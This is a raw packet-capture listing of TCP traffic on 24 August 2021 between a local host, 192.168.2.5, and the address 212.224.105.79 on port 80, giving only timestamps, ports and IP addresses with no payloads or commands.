Aug 24, 2021 08:49:20.057431936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057444096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057447910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057452917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057473898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057544947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057570934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057580948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057584047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057594061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057615042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057635069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057655096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057671070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057674885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057734013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057754993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057776928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057796001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057810068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057811975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057816982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057838917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057859898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057883978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057894945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057899952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057907104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057926893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057990074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058010101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058029890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058043957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058047056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058051109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058072090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058098078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058115959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058120012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058120012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058140039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058242083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058262110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058281898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058283091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058284044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058303118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058322906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058348894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058362961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058366060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058371067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058391094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058412075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058432102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058448076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058451891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058510065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058531046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058552027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058590889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058593988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058628082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058648109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058667898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058691978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058732986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058737993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058760881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058779955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058801889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058821917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058841944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058862925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058867931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058870077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058883905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058907986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058931112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058949947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058958054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058960915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.058970928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.058990955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059010983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059031010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059039116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059042931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059051037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059077024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059098959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059142113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059154034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059165955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059175968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059191942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059207916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059232950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059256077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059267044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059272051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059274912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059295893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059315920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059329033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059331894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059335947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059355974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059376955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059401989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059412003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059417009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059425116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059444904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059477091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059499025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059499979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059503078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059520006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059540033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059561014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059581041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059587955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059591055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059602022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059623003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059648991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059670925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.059674978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.059678078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.061705112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.067213058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.069422007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.069804907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.069978952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.070034027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.070188999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.070297956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.070590973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071156979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071177959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071224928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071250916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071264029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071276903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071293116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071304083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.071309090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.071309090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071325064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071341038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071360111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071372986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.071376085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071377993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.071392059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071403980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071415901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.071441889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.071444988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.073580980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.078819036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.078936100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079036951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079056025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079071045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079091072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079108000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079128027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079133987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079135895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079155922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079171896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079189062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079197884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079200983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079209089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079221964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079235077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079252005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079268932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079309940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079314947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079564095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079699993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079713106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079720020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079741001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079757929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079775095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079792023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079808950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079811096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079814911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079824924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079840899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079857111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079875946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079890013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079895020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079895020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079912901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079931021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.079965115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.079967976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080171108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080257893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080274105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080293894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080302000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080311060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080312014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080327988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080343962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080359936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080384970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080389023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080426931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080444098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080459118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080476046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080486059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080492973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080513000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080530882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080547094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080554008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080557108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080564022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080580950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.080601931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.080605984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.081190109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083611012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083632946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083650112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083664894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083683014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083698988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083698034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083709955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083719015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083736897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083775043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083789110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083791018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083792925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083807945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083823919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083839893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083854914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083873987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083878040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083880901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083890915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083906889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083923101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083934069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083936930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.083939075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083956003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083971977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.083987951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084001064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084005117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084007978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084026098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084042072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084054947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084057093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084058046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084074974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084090948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084106922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084121943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084129095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084132910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084141970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084158897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084175110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084189892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084189892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084193945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084207058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084223032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084239006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084253073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084260941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084263086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084273100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084290981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084306002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084321976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084326029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084331036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084338903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084355116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084371090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084386110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084404945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084405899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084408045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084423065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084439039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084455013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084465027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084470034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084470987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084489107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084503889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084520102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084523916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084527016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084538937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084557056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084573030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084588051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084604025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084613085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084616899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084619045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084635973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084651947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084671021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084673882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084677935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084687948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084703922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084722042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084733963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084738016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084738970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084753990 CEST	80	49712	212.224.105.79	192.168.2.5
